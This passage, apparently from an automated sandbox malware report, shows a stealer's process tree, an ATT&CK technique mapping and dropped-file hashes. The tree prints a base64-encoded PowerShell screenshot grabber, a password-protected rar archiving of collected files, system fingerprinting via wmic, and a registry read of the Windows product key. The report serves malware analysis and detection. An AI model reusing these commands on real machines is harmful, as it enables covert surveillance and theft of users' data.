    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4500
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2232
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g2gxy5iz\g2gxy5iz.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:652
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9114.tmp" "c:\Users\Admin\AppData\Local\Temp\g2gxy5iz\CSC24C1EC434A584BB5AFFA6FF58569FB28.TMP"
        6⤵
        
        PID:1316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2168
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2896
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:320
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2084
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1252
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:1284
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:1044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI39042\rar.exe a -r -hp"10241317" "C:\Users\Admin\AppData\Local\Temp\miFEl.zip" *"
    3⤵
    PID:5068
  - - C:\Users\Admin\AppData\Local\Temp\_MEI39042\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI39042\rar.exe a -r -hp"10241317" "C:\Users\Admin\AppData\Local\Temp\miFEl.zip" *
      4⤵
      Executes dropped EXE
      PID:4864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2896
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4112
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4848
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:328
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:1960
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1756
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:3880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:2104
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3760

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"
1⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2528
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4084
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=9A9254A254FB7860DAA3BC99529D0113 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2964
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=BFC65F227D3374FD2AA9304C95BF23DB --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=BFC65F227D3374FD2AA9304C95BF23DB --renderer-client-id=2 --mojo-platform-channel-handle=1768 --allow-no-sandbox-job /prefetch:1
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2060
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=29C2BBFF834774FEEA4812EB56030DDD --mojo-platform-channel-handle=2296 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4624
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=1B23C210564D36B83CDA7CDFCDED9946 --mojo-platform-channel-handle=1964 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1600
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A3FEE12E67D35786431A7488D9EE930B --mojo-platform-channel-handle=2488 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4044
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=4ACE6C69A1F287D22BCBDA383F4D9055 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=4ACE6C69A1F287D22BCBDA383F4D9055 --renderer-client-id=8 --mojo-platform-channel-handle=1980 --allow-no-sandbox-job /prefetch:1
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1872

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"
1⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:4692

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
6407d98690e63ec2db01f72db0535c40

SHA1
c503d55ad0694d47e9124b8dbb7acb7546cd8af0

SHA256
32fc867907916d89e64e4332e3f5121c9cf49a505165692c3f641e2c8c322581

SHA512
8f840655c13ea8209f60f007f59d21e2ca7c8baf33d89932c6d8c4b7217e03542536a92497e0dddd701ce88dccd5c992c69a464a93efe631acb66f26840f3d29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f0f59cccd39a3694e0e6dfd44d0fa76d

SHA1
fccd7911d463041e1168431df8823e4c4ea387c1

SHA256
70466c7f3a911368d653396fdd68f993322c69e1797b492ca00f8be34b7f3401

SHA512
5c726e1e28cb9c0c3ab963fbfbf471c6033839f3e535a3811581fdaa4da17175e5a8a8be84a4fccd99b81e048058e51d230ff3836e3ec920057a1b1676110bee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
60b3262c3163ee3d466199160b9ed07d

SHA1
994ece4ea4e61de0be2fdd580f87e3415f9e1ff6

SHA256
e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb

SHA512
081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
59b3e47fb22991dc550450c55c2a1a1d

SHA1
8f7cc1be5b807e0044a31f2987de8fb8d5e6d72a

SHA256
a546eefc15405c3b5f58fdfeac0aa9e101675128899766366475ae8819e3df0c

SHA512
aa1cf320fb54b140fdf45b7c4bfe2d0252ba98fe303893202ecdc4bfbf488d19629c075c809dd6890f77a56230cbf91ba1104454e1c107a84c731722ab330c95

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9114.tmp

Filesize
1KB

MD5
f3304ca3e16c4f10cc8dbd72182d61fa

SHA1
ee005b4d69cccbb3824fe5295d6039f09a2d3e57

SHA256
70d0941a61455a62265f8aace8c58dc60c289b354a4363393970be2e197c2e89

SHA512
3d092932976ff9d919338b7b836f320770702c06ab1d9b2d8c10301767d6f51c0696b1b95949ea9a27e937134e7f8a650edadad1e3e56fd13f74872f19a687fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39042\VCRUNTIME140.dll

Filesize
117KB

MD5
862f820c3251e4ca6fc0ac00e4092239

SHA1
ef96d84b253041b090c243594f90938e9a487a9a

SHA256
36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

SHA512
2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39042\_bz2.pyd

Filesize
49KB

MD5
e1b31198135e45800ed416bd05f8362e

SHA1
3f5114446e69f4334fa8cda9cda5a6081bca29ed

SHA256
43f812a27af7e3c6876db1005e0f4fb04db6af83a389e5f00b3f25a66f26eb80

SHA512
6709c58592e89905263894a99dc1d6aafff96ace930bb35abff1270a936c04d3b5f51a70fb5ed03a6449b28cad70551f3dccfdd59f9012b82c060e0668d31733

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39042\_ctypes.pyd

Filesize
63KB

MD5
b6262f9fbdca0fe77e96a9eed25e312f

SHA1
6bfb59be5185ceaca311f7d9ef750a12b971cbd7

SHA256
1c0f9c3bdc53c2b24d5480858377883a002eb2ebb57769d30649868bfb191998

SHA512
768321758fc78e398a1b60d9d0ac6b7dfd7fd429ef138845461389aaa8e74468e4bc337c1db829ba811cb58cc48cfff5c8de325de949dde6d89470342b2c8ce8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39042\_decimal.pyd

Filesize
119KB

MD5
9cfb6d9624033002bc19435bae7ff838

SHA1
d5eecc3778de943873b33c83432323e2b7c2e5c2

SHA256
41b0b60fe2aa2b63c93d3ce9ab69247d440738edb4805f18db3d1daa6bb3ebff

SHA512
dd6d7631a54cbd4abd58b0c5a8cb5a10a468e87019122554467fd1d0669b9a270650928d9de94a7ec059d4acebf39fd1cfcea482fc5b3688e7924aaf1369cc64

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39042\_hashlib.pyd

Filesize
36KB

MD5
0b214888fac908ad036b84e5674539e2

SHA1
4079b274ec8699a216c0962afd2b5137809e9230

SHA256
a9f24ad79a3d2a71b07f93cd56fc71958109f0d1b79eebf703c9ed3ac76525ff

SHA512
ae7aee8a11248f115eb870c403df6fc33785c27962d8593633069c5ff079833e76a74851ef51067ce302b8ea610f9d95c14be5e62228ebd93570c2379a2d4846

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39042\_lzma.pyd

Filesize
87KB

MD5
adeaa96a07b7b595675d9f351bb7a10c

